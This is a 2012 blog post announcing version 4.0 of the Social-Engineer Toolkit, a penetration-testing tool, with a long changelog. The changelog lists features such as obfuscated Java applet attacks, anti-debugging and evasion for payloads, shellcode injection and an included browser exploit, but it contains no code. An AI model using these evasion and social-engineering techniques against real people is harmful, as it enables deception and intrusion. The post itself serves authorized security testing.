Skip to Main Content
September 18, 2012

The Most Advanced Version of The Social-Engineer Toolkit To Date Released

Written by David Kennedy
Security Testing & Analysis Social Engineering
Welcome to one of the most advanced versions we have ever released. The Social-Engineer Toolkit (SET) version 4.0 codename "Balls of Steel" is officially available for public consumption. This version is the collection of several months of development and over 50 new features and a number of enhancements, improvements, rewrites, and bug fixes. In order to get the latest version of SET, download subversion and type svn co set/
SET 4.0
To highlight some of the new major features, the Java Applet attack has been completely rewritten and obfuscated with added evasion techniques. All of the payloads have been heavily encrypted with a number of heavy anti-debugging tools put in place. PyInjector is now available on the Java Applet attack natively and deploys shellcode automatically through a byte compiled executable. The powershell attack vectors now support customized payload selection through the config/set_config. A new attack vector has been added called the Dell DRAC Attack Vector (default credential finder).
The Social-Engineer Toolkit (SET) v4.0 "Balls of Steel" from David Kennedy on Vimeo.
A new teensy payload has been added from the Offensive-Security crew - the auto-correcting attack vector with DIP switch and SDcard "Peensy". The web cloner has been completely rewritten in native python removing the dependency for wget. The new IE zero day has been included in the Metasploit Web Attack Vector. The Java Repeater and Java Redirection has been rewritten to be more reliable. Obfuscation added to randomized droppers including OSX and Linux payloads. Overall, way to many to report on. Full changelog can be found below the image. Welcome to the new era of SET 4.0 - the most advanced social-engineering toolkit.
SET 4.0
~~~~~~~~~~~~~~~~ version 4.0 ~~~~~~~~~~~~~~~~ * added a new attack vector to SET called the Dell Drac attack vector under the Fast-Track menu. * Optimized the new attack vector into SET with standard core libraries * Added the source code for pyinjector to the set payloads * Added an optimized and obfuscated binary for pyinjector to the set payloads * Restructured menu systems to support new pyinjector payload for Java Applet Attack * Added new option to SET Java Applet - PyInjector - injects shellcode straight into memory through a byte compiled python executable. Does not require python to be installed on victim * Added base64 encoded to the parameters passed in shellcodexec and pyInjector * Added base64 decode routine in Java Applet using sun.misc.BASE64Decoder - native base64 decoding in Java is the suck * Java Applet redirect has been fixed - was a bug in how dynamic config files were changed * Fixed the UNC embed to work when the flag is set properly in the config file * Fixed the Java Repeater which would not work even if toggled on within the config file * Fixed an operand error when selecting high payloads, it would cause a non harmful error and an additional delay when selecting certain payloads in Java Applet * Added anti-debugging protection to pyinjector * Added anti-debugging protection to SET interactive shell * Added anti-debugging protection to Shellcodeexec * Added virtual entry points and virtualized PE files to pyinjector * Added virtual entry points and virtualized PE files to SET interactive shell * Added virtual entry points and virtualized PE files to Shellcodeexec * Added better obfsucation per generation on SET interactive shell and pyinjector * Redesigned Java Applet which adds heavily obfsucated methods for deploying * Removed Java Applet source code from being public - since redesign of applet, there are techniques used to obfuscate each time that are dynamic, better shelf life for applet * Added a new config option to allow you to select the payloads for the powershell injection attack. By specifying the config options allows you to customize what payload gets delivered via the powershell shellcode injection attack * Added double base64 encoding to make it more fun and better obfuscation per generation * Added update_config() each time SET is loaded, will ensure that all of the updates are always present and in place when launching the toolkit * Rewrote large portions of the Java Applet to be dynamic in nature and place a number of non descriptive things into place * Added better stability to the Java Applet attack, note that the delay between execution is a couple seconds based on the obfuscation techniques in place * Completely obfsucated the MAC and Linux binaries and generate a random name each time for deployment * Fixed a bug that would cause custom imported executables to not always import correctly * Fixed a bug that would cause a number above 16 to throw an invalid options error * Added better cleanup routines for when SET starts to remove old cached information and files * Fixed a bug that caused issues when deploy binaries was turned to off, would cause iterative loop for powershell and crash IE * Centralized more routines into set.options - this will be where all configuration options reside eventually * Added better stability when the Java Applet Repeater is loaded, the page will load properly then execute the applet. * The site cloner has been completely redesigned to use urllib2 instead of wget, long time coming * The cloner file has been cleaned up from a code perspective and efficiency * Added better request handling with the new urllib2 modules for the website cloning * Added user agent string configuration within the SET config and the new urllib2 fetching method * Added a pause when generating Teensy payloads * Added the Offensive-Security "Peensy" multi-attack vector for the Teensy attacks * Added the Microsoft Internet Explorer execCommand Use-After-Free Vulnerability from Metasploit into the Metasploit Browser Exploits Attack vectors * Fixed a bug in cleanup_routine that would cause the metasploit browser exploits to not function properly * Fixed a bug that caused the X10 sniffer and jammer to throw an exceptions if the folder already existed